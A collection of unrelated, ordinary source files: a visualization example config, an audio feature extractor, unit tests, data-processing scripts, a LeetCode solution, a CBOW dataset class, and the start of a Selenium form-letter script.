Nodes and Edges are styled with canvas specific styles like shadows.<br /><br />
<b>Click</b> on a node to select it.<br /><br />
You can <b>change the selection mode</b> from <em>Normal</em> selection (i.e. center the selected node) to
<em>Set as Root</em>.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'loadJSON multiple times',
'Description':
"""
Testing if loading different JSON tree/graph structures affects how the SpaceTree is displayed.
""",
'Extras': ['excanvas.js', 'generators.js'],
'Example': False
},
{
'Title': 'Style Animations',
'Description':
"""
This Advanced Example shows how Node, Edge, Label and Canvas specific style animations can be triggered for this
visualization.<br /><br />
<b>Select</b> the styles to be animated in the right column and hit the <em>Morph Styles</em> button. This will
set random values for these properties and animate them.<br /><br />
Click on <em>Restore Styles</em> to set the default styles.<br /><br />
Other styles like alpha and shadows can also be triggered.<br /><br />
This example also implements a custom node rendering function for Stroke + Fill rectangles.
""",
'Extras': ['excanvas.js'],
'Example': True
}
],
'Treemap': [
{
'Title': 'Test Squarified, SliceAndDice and Strip Treemap with random Tree',
'Description':
"""
Loads a random generated weighted tree and renders it as Squarified Tree by default.<br>
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Animated Squarified, SliceAndDice and Strip TreeMaps',
'Description':
"""
In this example a static JSON tree is loaded into a Squarified Treemap.<br /><br />
<b>Left click</b> to set a node as root for the visualization.<br /><br />
<b>Right click</b> to set the parent node as root for the visualization.<br /><br />
You can <b>choose a different tiling algorithm</b> below:
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'TreeMap with on-demand nodes',
'Description':
"""
This example shows how you can use the <b>request</b> controller method to create a TreeMap with on demand nodes<br /><br />
This example makes use of native Canvas text and shadows, but can be easily adapted to use HTML like the other examples.<br /><br />
There should be only one level shown at a time.<br /><br />
Clicking on a band should show a new TreeMap with its most listened albums.<br /><br />
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Cushion TreeMaps',
'Description':
"""
In this example a static JSON tree is loaded into a Cushion Treemap.<br /><br />
<b>Left click</b> to set a node as root for the visualization.<br /><br />
<b>Right click</b> to set the parent node as root for the visualization.<br /><br />
You can <b>choose a different tiling algorithm</b> below:
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Sorting Problem',
'Description':
"""
Layout in Squarified TreeMaps should be unique regardless of area.
""",
'Extras': ['excanvas.js'],
},
{
'Title': 'Morphing Treemaps',
'Description':
"""
Test Morphing Treemaps
""",
'Extras': ['excanvas.js'],
},
{
'Title': 'CSS3 label animations',
'Description':
"""
Trying to use CSS3 to animate the treemap labels.
""",
'Extras': ['excanvas.js']
},
],
'Icicle': [
{
'Title': 'Icicle Tree with static JSON data',
'Description':
"""
<p>Some static JSON tree data is fed to this visualization.</p>
<p>
<b>Left click</b> to set a node as root for the visualization.
</p>
<p>
<b>Right click</b> to set the parent node as root for the visualization.
</p>
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Icicle tree with limited levels shown',
'Description':
"""
<p>A static JSON tree representing a file system tree is loaded into
an Icicle Tree.</p>
<p>
<b>Left click</b> to set a node as root for the visualization.
</p>
<p>
<b>Right click</b> to set the parent node as root for the visualization.
</p>
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Icicle with CSS3 label animations',
'Description':
"""
<p>A static JSON tree representing a file system tree is loaded into
an Icicle Tree.</p>
<p>
<b>Left click</b> to set a node as root for the visualization.
</p>
<p>
<b>Right click</b> to set the parent node as root for the visualization.
</p>
""",
'Extras': ['excanvas.js'],
'Example': False
},
],
'ForceDirected': [
{
'Title': 'Force Directed Static Graph',
'Description':
"""
A static JSON Graph structure is used as input for this visualization.<br /><br />
You can <b>zoom</b> and <b>pan</b> the visualization by <b>scrolling</b> and <b>dragging</b>.<br /><br />
You can <b>change node positions</b> by <b>dragging the nodes around</b>.<br /><br />
The clicked node's connections are displayed in a relations list in the right column.<br /><br />
The JSON static data is customized to provide different node types, colors and widths.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Weighted Graph Animation',
'Description':
"""
A static JSON graph structure is used for this animation.<br /><br />
For each JSON node/edge the properties prefixed with the dollar sign ($) set the type of node/edge to be plotted, its style and its dimensions.<br /><br />
Line weights are added programmatically, <em>onBeforePlotLine</em>.<br /><br />
An <b>Elastic</b> transition is used instead of the linear transition for the animation.
""",
'Extras': ['excanvas.js'],
'Example':False
},
{
'Title': 'Graph Operations',
'Description':
"""
You can do the following operations with a ForceDirected viz:<br /><br />
1.- Removing subtrees or nodes<br /><br />
2.- Removing edges<br /><br />
3.- Adding another graph, also called sum<br /><br />
4.- Morphing (or transforming) the graph into another one<br />
""",
'Extras': ['excanvas.js'],
'Example':False
},
{
'Title': 'Graph Operations',
'Description':
"""
In this (advanced) example a static graph is fed into the visualization.<br /><br />
Custom Animations are triggered when clicking on a node's label or when deleting a node.<br /><br />
<b>Click on a node's label</b> to select a node and its connections.<br /><br />
<b>Click on the 'x' link</b> to delete a node.<br /><br />
You can <b>drag nodes</b> around and <b>zoom</b> and <b>pan</b>, just like you did in the previous
example.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Event delegation for labels',
'Description':
"""
Testing event delegation for Extras in ForceDirected graph labels.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Force Directed Static Graph',
'Description':
"""
Infinite iterations.
""",
'Extras': ['excanvas.js'],
'Example': False
},
],
'ForceDirected3D': [
{
'Title': 'Force Directed Static Graph',
'Description':
"""
A static JSON Graph structure is used as input for this visualization.<br /><br />
You can <b>zoom</b> and <b>pan</b> the visualization by <b>scrolling</b> and <b>dragging</b>.<br /><br />
You can <b>change node positions</b> by <b>dragging the nodes around</b>.<br /><br />
The clicked node's connections are displayed in a relations list in the right column.<br /><br />
The JSON static data is customized to provide different node types, colors and widths.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Force Directed Static Graph',
'Description':
"""
A static JSON Graph structure is used as input for this visualization.<br /><br />
You can <b>zoom</b> and <b>pan</b> the visualization by <b>scrolling</b> and <b>dragging</b>.<br /><br />
You can <b>change node positions</b> by <b>dragging the nodes around</b>.<br /><br />
The clicked node's connections are displayed in a relations list in the right column.<br /><br />
The JSON static data is customized to provide different node types, colors and widths.
""",
'Extras': ['excanvas.js'],
'Example':True
},
],
'Other': [
{
'Title': 'Implementing Node Types',
'Description':
"""
In this example some custom node types are created for rendering pie charts with the RGraph.<br /><br />
Multiple instances of the RGraph are created using these node types. (top)<br /><br />
The SpaceTree is loaded with some custom data that individually changes nodes dimensions, making a bar chart (bottom).
""",
'Extras': ['excanvas.js'],
'Build': ['RGraph', 'Spacetree'],
'Example': True
},
{
'Title': 'Composing Visualizations',
'Description':
"""
In this example a RGraph is composed with another RGraph (for node rendering).<br /><br />
The RGraph used for node rendering implements a custom node type defined in the <em>"Implementing Node Types"</em> example.<br /><br />
This example shows that many visualizations can be composed to create new visualizations.
""",
'Extras': ['excanvas.js'],
'Build': ['RGraph'],
'Example': True
},
{
'Title': 'Composing Visualizations 2',
'Description':
"""
In this example a SpaceTree is composed with a RGraph (for node rendering).<br /><br />
The RGraph used for node rendering implements a custom node type defined in the <em>"Implementing Node Types"</em> example.<br /><br />
This example shows that many visualizations can be composed to create new visualizations.
""",
'Extras': ['excanvas.js'],
'Build': ['RGraph', 'Spacetree'],
'Example': True
},
{
'Title': 'SVG and Native Labels',
'Description':
"""
In this example we're using three different types of labels.<br /><br />
HTML labels are classic DOM elements.<br />
SVG labels are very similar to HTML labels (they're also DOM elements) but they can be rotated and transformed.<br />
Native labels are drawn with the Native Canvas HTML5 API.<br /><br />.
HTML labels are supported by all browsers. SVG labels are supported by all browsers except IE. Native Canvas labels are
supported by all browsers except Opera.
""",
'Extras': ['excanvas.js'],
'Build': ['RGraph', 'Hypertree'],
'Example': False
}
],
'Sunburst': [
{
'Title': 'Animation and Expand/Collapse',
'Description':
"""
A static JSON Tree structure is used as input for this animation.<br /><br />
The centered node's children are displayed in a relations list in the right column.<br /><br />
Left clicking will rotate the sunburst leaving the clicked node horizontal. The node will also change its color.<br /><br />.
Right clicking will collapse/expand nodes.
""",
'Extras': ['excanvas.js'],
'Example':False
},
{
'Title': 'Rose Diagrams',
'Description':
"""
A static JSON Tree structure is used as input for this animation that represents a rose pie chart.<br /><br />
Hovering nodes should add a tooltip and change the node's color.
""",
'Extras': ['excanvas.js'],
'Example':False
},
{
'Title': 'Connected Sunburst',
'Description':
"""
A static JSON Graph structure is used as input for this visualization.<br /><br />
This example shows how properties such as color, height, angular width and line width
can be customized per node and per edge in the JSON structure.<br /><br />
<b>Left click</b> to select a node and show its relations.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Sunburst of a Directory Tree',
'Description':
"""
A static JSON Tree structure is used as input for this visualization.<br /><br />
Tips are used to describe the file size and its last modified date.<br /><br />
<b>Left click</b> to rotate the Sunburst to the selected node and see its details.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Mono node Sunburst',
'Description':
"""
""",
'Extras': ['excanvas.js'],
'Example': False
},
],
'AreaChart': [
{
'Title': 'Area Chart Example',
'Description':
"""
A static Area Chart example with gradients that displays tooltips when hovering the stacks.<br /><br />
Left-click a Stack to apply a filter to it.<br /><br />
Right-click to restore all stacks.<br /><br />
Click the Update button to update the JSON data.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Area Chart Example with click events',
'Description':
"""
A static Area Chart example with gradients that displays tooltips when hovering the stacks.<br /><br />
Left-click a Stack to apply a filter to it.<br /><br />
Right-click to restore all stacks.<br /><br />
Click the Update button to update the JSON data.
""",
'Extras': ['excanvas.js'],
'Example': False
}
],
'BarChart': [
{
'Title': 'Bar Chart Example',
'Description':
"""
A static vertical Bar Chart example with gradients. The Bar Chart displays tooltips when hovering the stacks. <br /><br />
Click the Update button to update the JSON data.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Bar Chart Example',
'Description':
"""
A static horizontal Bar Chart example without gradients. The Bar Chart displays tooltips when hovering the stacks.<br /><br />
Click the Update button to update the JSON data.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Bar Chart Example with events',
'Description':
"""
A static vertical Bar Chart example with gradients. The Bar Chart displays tooltips when hovering the stacks. <br /><br />
Click the Update button to update the JSON data.
""",
'Extras': ['excanvas.js'],
'Example': False
},
],
'PieChart': [
{
'Title': 'Pie Chart Example',
'Description':
"""
A static Pie Chart example with gradients that displays tooltips when hovering the stacks.<br /><br />
Click the Update button to update the JSON data.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Mono Valued PieChart',
'Description':
"""
More like a regular PieChart (mono valued).
""",
'Extras': ['excanvas.js'],
'Example': False
},
{
'Title': 'Pie Chart Example with events',
'Description':
"""
A static Pie Chart example with gradients that displays tooltips when hovering the stacks.<br /><br />
Click the Update button to update the JSON data.
""",
'Extras': ['excanvas.js'],
'Example': False
},
],
'TimeGraph': [
{
'Title': 'TimeGraph Example',
'Description':
"""
A static TimeGraph Example.
""",
'Extras': ['excanvas.js']
},
],
'HeatMap': [
{
'Title': 'HeatMap Example',
'Description':
"""
A static HeatMap Example.
""",
'Extras': ['excanvas.js']
},
]
}
|
# Copyright 2020 ByteDance Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy
from neurst.data.audio import FeatureExtractor, register_feature_extractor
from neurst.utils.flags_core import Flag
try:
from python_speech_features import logfbank
except ImportError:
pass
@register_feature_extractor("fbank")
class LogMelFbank(FeatureExtractor):
def __init__(self, args):
self._nfilt = args["nfilt"]
self._winlen = args["winlen"]
self._winstep = args["winstep"]
try:
from python_speech_features import logfbank
_ = logfbank
except ImportError:
raise ImportError('Please install python_speech_features with: pip3 install python_speech_features')
@staticmethod
def class_or_method_args():
return [
Flag("nfilt", dtype=Flag.TYPE.INTEGER, default=80,
help="The number of frames in the filterbank."),
Flag("winlen", dtype=Flag.TYPE.FLOAT, default=0.025,
help="The length of the analysis window in seconds. Default is 0.025s."),
Flag("winstep", dtype=Flag.TYPE.FLOAT, default=0.01,
help="The step between successive windows in seconds. Default is 0.01s.")
]
@property
def feature_dim(self):
return self._nfilt
def seconds(self, feature):
return (numpy.shape(feature)[0] - 1.) * self._winstep + self._winlen
def __call__(self, signal, rate):
inp = logfbank(signal, samplerate=rate, nfilt=self._nfilt,
winlen=self._winlen, winstep=self._winstep).astype(numpy.float32)
inp = (inp - numpy.mean(inp)) / numpy.std(inp)
return inp
|
from collections import MutableSequence
class uniquelist(MutableSequence):
"""This is a list type that only adds unique values. Otherwise it behaves
entirely normally"""
def __init__(self, data=None):
super(uniquelist, self).__init__()
if not (data is None):
self._list = list(data)
else:
self._list = list()
def __len__(self):
return len(self._list)
def __getitem__(self, ii):
return self._list[ii]
def __delitem__(self, ii):
del self._list[ii]
def __setitem__(self, ii, val):
self._list[ii] = val
return self._list[ii]
def __str__(self):
return self.__repr__()
def __repr__(self):
return """<uniquelist %s>""" % self._list
def insert(self, ii, val):
self._list.insert(ii, val)
def append(self, val):
if val not in self._list:
list_idx = len(self._list)
self.insert(list_idx, val)
|
import os.path
from unittest import TestCase
import numpy as np
from aspire.utils import (
Rotation,
crop_pad_2d,
get_aligned_rotations,
grid_2d,
grid_3d,
register_rotations,
uniform_random_angles,
)
DATA_DIR = os.path.join(os.path.dirname(__file__), "saved_test_data")
class UtilsTestCase(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testGrid2d(self):
# Note these reference files were created using Matlab compat grid indexing.
grid2d = grid_2d(8, indexing="xy")
self.assertTrue(
np.allclose(grid2d["x"], np.load(os.path.join(DATA_DIR, "grid2d_8_x.npy")))
)
self.assertTrue(
np.allclose(grid2d["y"], np.load(os.path.join(DATA_DIR, "grid2d_8_y.npy")))
)
self.assertTrue(
np.allclose(grid2d["r"], np.load(os.path.join(DATA_DIR, "grid2d_8_r.npy")))
)
self.assertTrue(
np.allclose(
grid2d["phi"], np.load(os.path.join(DATA_DIR, "grid2d_8_phi.npy"))
)
)
def testGrid3d(self):
# Note these reference files were created using Matlab compat grid indexing.
grid3d = grid_3d(8, indexing="xyz")
self.assertTrue(
np.allclose(grid3d["x"], np.load(os.path.join(DATA_DIR, "grid3d_8_x.npy")))
)
self.assertTrue(
np.allclose(grid3d["y"], np.load(os.path.join(DATA_DIR, "grid3d_8_y.npy")))
)
self.assertTrue(
np.allclose(grid3d["z"], np.load(os.path.join(DATA_DIR, "grid3d_8_z.npy")))
)
self.assertTrue(
np.allclose(grid3d["r"], np.load(os.path.join(DATA_DIR, "grid3d_8_r.npy")))
)
self.assertTrue(
np.allclose(
grid3d["phi"], np.load(os.path.join(DATA_DIR, "grid3d_8_phi.npy"))
)
)
self.assertTrue(
np.allclose(
grid3d["theta"], np.load(os.path.join(DATA_DIR, "grid3d_8_theta.npy"))
)
)
def testRegisterRots(self):
angles = uniform_random_angles(32, seed=0)
rots_ref = Rotation.from_euler(angles).matrices
q_ang = [[np.pi / 4, np.pi / 4, np.pi / 4]]
q_mat = Rotation.from_euler(q_ang).matrices[0]
flag = 0
regrots_ref = get_aligned_rotations(rots_ref, q_mat, flag)
q_mat_est, flag_est = register_rotations(rots_ref, regrots_ref)
self.assertTrue(np.allclose(flag_est, flag) and np.allclose(q_mat_est, q_mat))
def testSquareCrop2D(self):
# Test even/odd cases based on the convention that the center of a sequence of length n
# is (n+1)/2 if n is odd and n/2 + 1 if even.
# Cropping is done to keep the center of the sequence the same value before and after.
# Therefore the following apply:
# Cropping even to odd will result in the 0-index (beginning)
# of the sequence being chopped off (x marks the center, ~ marks deleted data):
# ---x-- => ~--x--
# Cropping odd to even will result in the -1-index (end)
# of the sequence being chopped off:
# ---x--- => ---x--~
# even to even
a = np.diag(np.arange(8))
test_a = np.diag(np.arange(1, 7))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 6)))
# even to odd
# the extra row/column cut off are the top and left
# due to the centering convention
a = np.diag(np.arange(8))
test_a = np.diag(np.arange(1, 8))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 7)))
# odd to odd
a = np.diag(np.arange(9))
test_a = np.diag(np.arange(1, 8))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 7)))
# odd to even
# the extra row/column cut off are the bottom and right
# due to the centering convention
a = np.diag(np.arange(9))
test_a = np.diag(np.arange(8))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 8)))
def testSquarePad2D(self):
# Test even/odd cases based on the convention that the center of a sequence of length n
# is (n+1)/2 if n is odd and n/2 + 1 if even.
# Padding is done to keep the center of the sequence the same value before and after.
# Therefore the following apply:
# Padding from even to odd results in the spare padding being added to the -1-index (end)
# of the sequence (x represents the center, + represents padding):
# ---x-- => ---x--+
# Padding from odd to even results in the spare padding being added to the 0-index (beginning)
# of the sequence:
# --x-- => +--x--
# even to even
a = np.diag(np.arange(1, 9))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 0])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 10)))
# even to odd
# the extra padding is to the bottom and right
# due to the centering convention
a = np.diag(np.arange(1, 9))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 0])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 11)))
# odd to odd
a = np.diag(np.arange(1, 10))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 11)))
# odd to even
# the extra padding is to the top and left
# due to the centering convention
a = np.diag(np.arange(1, 10))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 10)))
def testRectCrop2D(self):
# Additional sanity checks for rectangular cropping case
# 12x10 -> 10x10
a = np.diag(np.arange(1, 11))
# augment to 12 rows
aug = np.vstack([a, np.zeros(10)])
aug = np.vstack([np.zeros(10), aug])
# make sure the top and bottom rows are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 10)))
# 10x12 -> 10x10
a = np.diag(np.arange(1, 11))
# augment to 12 columns
aug = np.column_stack([a, np.zeros(10)])
aug = np.column_stack([np.zeros(10), aug])
# make sure the left and right columns are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 10)))
# 9x7 -> 7x7
a = np.diag(np.arange(1, 8))
# augment to 9 rows
aug = np.vstack([a, np.zeros(7)])
aug = np.vstack([np.zeros(7), aug])
# make sure the top and bottom rows are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 7)))
# 7x9 -> 7x7
a = np.diag(np.arange(1, 8))
# augment to 9 columns
aug = np.column_stack([a, np.zeros(7)])
aug = np.column_stack([np.zeros(7), aug])
# make sure the left and right columns are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 7)))
def testRectPad2D(self):
# Additional sanity checks for rectangular padding case
# 12x10 -> 12x12
a = np.diag(np.arange(1, 11))
# augment to 12 rows
aug = np.vstack([a, np.zeros(10)])
aug = np.vstack([np.zeros(10), aug])
# expected result
padded = np.column_stack([aug, np.zeros(12)])
padded = np.column_stack([np.zeros(12), padded])
# make sure columns of fill value (0) are added to the
# left and right
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 12)))
# 10x12 -> 12x12
a = np.diag(np.arange(1, 11))
# augment to 12 columns
aug = np.column_stack([a, np.zeros(10)])
aug = np.column_stack([np.zeros(10), aug])
# expected result
padded = np.vstack([aug, np.zeros(12)])
padded = np.vstack([np.zeros(12), padded])
# make sure rows of fill value (0) are added to the
# top and bottom
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 12)))
# 9x7 -> 9x9
a = np.diag(np.arange(1, 8))
# augment to 9 rows
aug = np.vstack([a, np.zeros(7)])
aug = np.vstack([np.zeros(7), aug])
# expected result
padded = np.column_stack([aug, np.zeros(9)])
padded = np.column_stack([np.zeros(9), padded])
# make sure columns of fill value (0) are added to the
# left and right
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 9)))
# 7x9 -> 9x9
a = np.diag(np.arange(1, 8))
# augment to 9 columns
aug = np.column_stack([a, np.zeros(7)])
aug = np.column_stack([np.zeros(7), aug])
# expected result
padded = np.vstack([aug, np.zeros(9)])
padded = np.vstack([np.zeros(9), padded])
# make sure rows of fill value (0) are added to the
# top and bottom
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 9)))
def testCropPad2DError(self):
with self.assertRaises(ValueError) as e:
_ = crop_pad_2d(np.zeros((6, 10)), 8)
self.assertTrue(
"Cannot crop and pad an image at the same time.", str(e.exception)
)
def testCrop2DDtype(self):
# crop_pad_2d must return an array of the same dtype it was given
# in particular, because the method is used for Fourier downsampling
# methods involving cropping complex arrays
self.assertEqual(
crop_pad_2d(np.eye(10).astype("complex"), 5).dtype, np.dtype("complex128")
)
def testCrop2DFillValue(self):
# make sure the fill value is as expected
# we are padding from an odd to an even dimension
# so the padded column is added to the left
a = np.ones((4, 3))
b = crop_pad_2d(a, 4, fill_value=-1)
self.assertTrue(np.array_equal(b[:, 0], np.array([-1, -1, -1, -1])))
|
#!/usr/bin/python
#
# Copyright 2010 Google Inc. All Rights Reserved.
__author__ = 'asharif@google.com (Ahmad Sharif)'
import unittest
from automation.common import machine
from automation.server import machine_manager
class MachineManagerTest(unittest.TestCase):
def setUp(self):
self.machine_manager = machine_manager.MachineManager()
def testPrint(self):
print self.machine_manager
def testGetLinuxBox(self):
mach_spec_list = [machine.MachineSpecification(os='linux')]
machines = self.machine_manager.GetMachines(mach_spec_list)
self.assertTrue(machines)
def testGetChromeOSBox(self):
mach_spec_list = [machine.MachineSpecification(os='chromeos')]
machines = self.machine_manager.GetMachines(mach_spec_list)
self.assertTrue(machines)
if __name__ == '__main__':
unittest.main()
|
from pyspark.sql import SparkSession
spark = SparkSession.builder.master("local").appName('ReadParquet').config("spark.driver.host", "localhost").config(
"spark.ui.port", "4040").getOrCreate()
peopleDF = spark.read.json("people.json")
# DataFrames can be saved as Parquet files, maintaining the schema information.
peopleDF.write.format("parquet").mode("overwrite").save("people.parquet")
# Read in the Parquet file created above.
# Parquet files are self-describing so the schema is preserved.
# The result of loading a parquet file is also a DataFrame.
parquetFile = spark.read.parquet("people.parquet")
# Parquet files can also be used to create a temporary view and then used in SQL statements.
parquetFile.createOrReplaceTempView("parquetFile")
teenagers = spark.sql("SELECT name FROM parquetFile WHERE age >= 13 AND age <= 19")
teenagers.show()
# spark.stop()
|
# ------------------------------
# 530. Minimum Absolute Difference in BST
#
# Description:
# Given a binary search tree with non-negative values, find the minimum absolute difference between values of any two nodes.
# Example:
# Input:
# 1
# \
# 3
# /
# 2
# Output:
# 1
# Explanation:
# The minimum absolute difference is 1, which is the difference between 2 and 1 (or between 2 and 3).
#
# Note: There are at least two nodes in this BST.
#
# Version: 1.0
# 07/14/18 by Jianfa
# ------------------------------
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def __init__(self):
self.minDiff = float('inf')
self.pre = None
def getMinimumDifference(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if not root:
return self.minDiff
self.getMinimumDifference(root.left)
if self.pre != None:
self.minDiff = min(self.minDiff, root.val - self.pre)
self.pre = root.val
self.getMinimumDifference(root.right)
return self.minDiff
# Used for testing
if __name__ == "__main__":
test = Solution()
# ------------------------------
# Summary:
# Inorder travesal solution. Idea from https://leetcode.com/problems/minimum-absolute-difference-in-bst/discuss/99905/Two-Solutions-in-order-traversal-and-a-more-general-way-using-TreeSet
|
import tensorflow as tf
from garage.tf.models import Model
class SimpleMLPModel(Model):
"""Simple MLPModel for testing."""
def __init__(self, name, output_dim, *args, **kwargs):
super().__init__(name)
self.output_dim = output_dim
def _build(self, obs_input):
return tf.fill((tf.shape(obs_input)[0], self.output_dim), 0.5)
|
import numpy as np
import torch
from torch.utils.data import Dataset
class CBOWDataSet(Dataset):
def __init__(self, corpus,
pipeline='hier_softmax',
nodes_index=None,
turns_index=None,
vocab_size=None,
neg_samples=None,
max_path_len=17,
window_size=6,
device=None,
skip_target=False,
dtype=torch.float32):
"""
:param corpus: the flat list of tokens
:param pipeline: 'hier_softmax'/'neg_sampling'
params for 'hierarchical softmax' pipeline:
:param nodes_index: index of nodes from leaf parent to the root
:param turns_index: the list of 1/-1 indices:
1 — the leaf is the left child of corresponding node
-1 — the leaf is the right child
:param vocab_size: is used for padding
:param max_path_len: length of the longest path from word (leaf)
to the root
params for 'negative sampling' pipeline:
:param neg_samples: the number of negative samples
:param window_size: word context size
:param device: cuda:0/cuda:1/cpu
:param dtype: torch float type
"""
self.window_size = window_size
self.step = window_size // 2
self.left_step = self.step
self.right_step = window_size - self.step
self.corpus = corpus[-self.left_step:] + corpus + \
corpus[:self.right_step]
self.device = device
self.dtype = dtype
self.pipeline = pipeline
if self.pipeline == 'hier_softmax':
self.nodes_index = nodes_index
self.max_path_len = max_path_len
self.turns_index = turns_index
self.vocab_size = vocab_size
self.skip_target = skip_target
elif self.pipeline == 'neg_sampling':
self.np_corpus = np.array(self.corpus)
self.neg_samples = neg_samples
else:
raise NotImplementedError(
f'Pipeline for "pipeline": {self.pipeline}')
def __len__(self):
return len(self.corpus) - self.window_size
def __getitem__(self, item):
if self.pipeline == 'hier_softmax':
return self.__h_getitem(item)
elif self.pipeline == 'neg_sampling':
return self.__n_getitem(item)
else:
raise NotImplementedError(
f'__getitem__ for pipeline: {self.pipeline}')
def __h_getitem(self, i):
"""
Hierarchical softmax pipepline
:param i: item index
:return: torch tensors:
context, target, nodes, mask, turns_coeffs
"""
i += self.left_step
target = self.corpus[i]
context = self.corpus[(i - self.left_step):i]
context += self.corpus[(i + 1):(i + self.right_step + 1)]
try:
assert len(context) == self.window_size
except AssertionError:
raise Exception(
'Context size is not valid: context - '
'{0} has size - {1}; window_size - {2}'
.format(context, len(context), self.window_size)
)
nodes = self.nodes_index[target]
nodes_len = len(nodes)
mask = np.zeros(self.max_path_len)
mask[:nodes_len] = 1
pad_len = self.max_path_len - nodes_len
nodes = np.concatenate([nodes, np.ones(pad_len) * self.vocab_size])
# nodes = np.concatenate([nodes, np.ones(pad_len) * -1])
nodes = torch.tensor(nodes, dtype=torch.long, device=self.device)
turns_coeffs = self.turns_index.get(target)
turns_coeffs = np.concatenate([turns_coeffs, np.zeros(pad_len)])
turns_coeffs = torch.tensor(turns_coeffs, dtype=self.dtype,
device=self.device)
mask = torch.tensor(mask, dtype=self.dtype, device=self.device)
context = torch.tensor(context, dtype=torch.long, device=self.device)
target = torch.tensor(target, dtype=torch.long, device=self.device)
if self.skip_target is False:
return context, target, nodes, mask, turns_coeffs
else:
return context, nodes, mask, turns_coeffs
def __n_getitem(self, i):
"""
Negative sampling pipeline
:param i: item index
:return: torch tensors:
context, target, neg_samples
"""
i += self.left_step
target = self.corpus[i]
context = self.corpus[(i - self.left_step):i]
context += self.corpus[(i + 1):(i + self.right_step + 1)]
try:
assert len(context) == self.window_size
except AssertionError:
raise Exception(
'Context size is not valid: context - '
'{0} has size - {1}; window_size - {2}'
.format(context, len(context), self.window_size)
)
context = torch.tensor(context, dtype=torch.long, device=self.device)
target = torch.tensor(target, dtype=torch.long, device=self.device)
return context, target
|
# pylint: disable=W0212
'''
Unit tests for operators.py.
These tests should NOT require MPI.
'''
import unittest as ut
import numpy as np
from dynamite.bitwise import popcount, parity, intlog2
class PopcountParity(ut.TestCase):
test_cases = [
(0, 0),
(1, 1),
(2, 1),
(3, 2),
(4, 1),
(6, 2),
(9, 2),
(11, 3),
(12, 2),
(35, 3),
(59, 5),
(148742, 6)
]
def test_popcount(self):
for x,p in self.test_cases:
with self.subTest(x=x):
self.assertEqual(popcount(x), p)
def test_parity_single(self):
for x,p in self.test_cases:
with self.subTest(x=x):
self.assertEqual(parity(x), p%2)
def test_parity_array(self):
x, p = np.array(self.test_cases, dtype = int).T
self.assertTrue(np.all(parity(x) == p%2))
class IntLog2(ut.TestCase):
test_cases = [
(0, -1),
(1, 0),
(4, 2),
(6, 2),
(12, 3),
(148742, 17)
]
def test_single(self):
for x,l in self.test_cases:
with self.subTest(x=x):
self.assertEqual(intlog2(x), l)
def test_array(self):
x, l = np.array(self.test_cases, dtype = int).T
self.assertTrue(np.all(intlog2(x) == l))
if __name__ == '__main__':
ut.main()
|
#import libraries
from selenium import webdriver
import time
import datetime
import pandas as pd
def automate_sender(
driverpath : str = "Path to chromedriver",
sender_file_path : str = "sender.txt",
sender_df_path : str = "mdcu71_namelist.csv",
greeting_file_path : str = "greeting_mdcu.txt",
in_production : bool = False
):
"""
if you want to run this code in production mode, please toggle in_production to True
"""
df = pd.read_csv(sender_df_path)
mdcu_list = list(df.mdcu_name)
num_letters = len(mdcu_list)
letter_text = "letters"
if(num_letters == 1):
letter_text = "letter"
mdcu_url = "https://docs.google.com/forms/d/e/1FAIpQLSe4W2RxromJwtqCq8ZzGvgHr6Zy6Bfm44nzcgDlgZeBuZfBGQ/viewform"
if(not in_production):
print("You are in the TEST mode.")
print(f"This script will send {num_letters} {letter_text}.")
with open(sender_file_path, 'r') as sender_file:
sender_txt = f"{sender_file.read()}".format(**locals()).strip()
# sending mail merge
for i in range(len(mdcu_list)):
# rest time from previous session
driver = webdriver.Chrome(driverpath)
time.sleep(1)
